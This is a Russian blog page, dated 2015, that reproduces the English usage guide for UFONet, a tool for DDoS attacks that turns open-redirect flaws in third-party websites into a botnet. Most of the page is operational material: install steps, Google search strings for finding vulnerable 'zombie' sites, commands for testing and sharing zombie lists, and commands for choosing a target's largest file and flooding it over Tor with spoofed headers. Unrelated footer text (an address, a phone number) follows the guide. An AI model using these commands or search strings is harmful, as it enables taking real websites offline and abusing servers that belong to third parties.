Главная » Статьи » Мои статьи

UFONet: DDoS Attack tools

UFONet - is a tool designed to launch DDoS attacks against a target, using 'Open Redirect' vectors on third party web applications, like botnet.

 

 

 

 


  • Options:
 --version show program's version number and exit
 -v, --verbose active verbose on requests
 --check-tor check to see if Tor is used properly
 --force-yes Set 'YES' to all questions
 --update check for latest stable version
 --gui launch GUI/Web Interface

 *Configure Request(s)*:
 --proxy=PROXY Use proxy server (tor: http://localhost:8118)
 --user-agent=AGENT Use another HTTP User-Agent header (default SPOOFED)
 --referer=REFERER Use another HTTP Referer header (default SPOOFED)
 --host=HOST Use another HTTP Host header (default NONE)
 --xforw Set your HTTP X-Forwarded-For with random IP values
 --xclient Set your HTTP X-Client-IP with random IP values
 --timeout=TIMEOUT Select your timeout (default 30)
 --retries=RETRIES Retries when the connection timeouts (default 1)
 --delay=DELAY Delay in seconds between each HTTP request (default 0)

 *Manage Botnet*:
 -s SEARCH Search 'zombies' on google (ex: -s 'proxy.php?url=')
 --sd=DORKS Search from a list of 'dorks' (ex: --sd dorks.txt)
 --sn=NUM_RESULTS Set max number of result to search (default 10)
 -t TEST Test list of web 'zombie' servers (ex: -t zombies.txt)

 *Community Botnet*:
 --download-zombies Download list of 'zombies' from Community
 --upload-zombies Share your 'zombies' with Community

 *Research Target*:
 -i INSPECT Inspect object's sizes (ex: -i http(s)://target.com)

 *Configure Attack(s)*:
 -r ROUNDS Set number of 'rounds' for the attack (default: 1)
 -b PLACE Set a place to 'bit' on target (ex: -b /path/big.jpg)
 -a TARGET Start a Web DDoS attack (ex: -a http(s)://target.com)

  • Download:

Current version: v0.4b - Infection!

git clone https://github.com/epsylon/ufonet

Package: UFOnet(.zip)


  • Installing:
UFONet runs on many platforms. It requires Python and the following library:

 python-pycurl - Python bindings to libcurl

On Debian-based systems (ex: Ubuntu), run: 

 sudo apt-get install python-pycurl

Source libs: Python | PyCurl

  • Searching for 'zombies':
 UFONet will search on google results for possible 'Open Redirect' vulnerable sites. 
 A common query string should be like this:

 'proxy.php?url='
 'check.cgi?url='
 'checklink?uri='
 'validator?uri='

 So for example, you can begin a search with:

 ./ufonet -s 'proxy.php?url='

 At the end of the process, you will be asked if you want to check the list retrieved to see 
 if the urls are vulnerable.

 Wanna check if they are valid zombies? (Y/n)

 Also, you will be asked to update the list adding automatically only 'vulnerable' web apps.

 Wanna update your list (Y/n)

 If you reply 'Y', your new 'zombies' will be appended to the file named: zombies.txt

 -------------
 Examples:

 + with verbose: ./ufonet -s 'proxy.php?url=' -v
 + retrieve 15 urls: ./ufonet -s 'proxy.php?url=' --sn 15

  • Testing botnet:
 Open 'zombies.txt' (or another file) and create a list of possible 'zombies'. 
 Urls of the 'zombies' should be like this:

 http://target.com/check?uri=

 After that, launch it:

 ./ufonet -t zombies.txt

 At the end of the process, you will be asked if you want to update the list 
 adding automatically only 'vulnerable' web apps.

 Wanna update your list (Y/n)

 If you reply 'Y', your file: zombies.txt will be updated.

 -------------
 Examples:

 + with verbose: ./ufonet -t zombies.txt -v
 + with proxy TOR: ./ufonet -t zombies.txt --proxy="http://127.0.0.1:8118"

  • Inspecting a target:
 This option is useful to know the best place to attack your target.

 It will crawl your objetive to provide you with a URL path to the largest object (size)
 found in the HTML code.

 ./ufonet -i http://target.com

 Then, you will can drive your 'zombies' to reload just there, doing your most effective attack.

 ./ufonet -a http://target.com -b "/biggest_file_on_target.xxx"

  • Attacking a target:
 Enter a target to attack, with the number of rounds that will be attacked:

 ./ufonet -a http://target.com -r 10

 This will attack the target, with the list of 'zombies' that your provided on: "zombies.txt", 
 a number of 10 times for each 'zombie'. That means, that if you have a list of 1.000 'zombies', 
 the program will launch 1.000 'zombies' x 10 rounds = 10.000 'hits' to the target.

 By default, if you don't put any round, it will apply only 1.

 Additionally, you can choose a place to recharge on target's site. For example, a large image, 
 a big size file or a flash movie. In some scenarios where targets doesn't use cache systems, 
 this will do the attack more effective.

 ./ufonet -a http://target.com -b "/images/big_size_image.jpg"

 -------------
 Examples:

 + with verbose: ./ufonet -a http://target.com -r 10 -v
 + with proxy TOR: ./ufonet -a http://target.com -r 10 --proxy="http://127.0.0.1:8118"
 + with a place: ./ufonet -a http://target.com -r 10 -b "/images/big_size_image.jpg"

  • Updating:
 UFONet implements an option to update the tool to the latest stable version.
 This feature can be used only if you have cloned it from GitHub repository

 To check your version you should launch:

 ./ufonet --update

 This will update the tool automatically, removing all files from your old package.

 

===========================================================================

888     888 8888888888 .d88888b.  888b    888          888    
888     888 888        d88PY888b  8888b   888          888    
888     888 888       888     888 88888b  888          888    
888     888 8888888   888     888 888Y88b 888  .d88b.  888888
888     888 888       888     888 888 Y88b888 d8P  Y8b 888    
888     888 888       888     888 888  Y88888 88888888 888    
Y88b. .d88P 888       Y88b. .d88P 888   Y8888 Y8b.     Y88b.  
 'Y88888P'  888        'Y88888P'  888    Y888  'Y8888   'Y8888

UFONet - DDoS attacks via Web Abuse - by psy

===========================================================================

 



Источник: http://ufonet, ddos, kali, linux, pentest, python,
Категория: Мои статьи | Добавил: sl@vjnin (01.05.2015)
Просмотров: 10223 | Теги: DdoS, Python, pentest, ufonet, kali, Linux | Рейтинг: 0.0/0
Всего комментариев: 0
avatar
Investigationes
CHARLES S. ANDREWS
3139 Brownton Road
Long Community, MS 38915



+7 495 287-42-34 info@ucoz.com
Mirum
sample map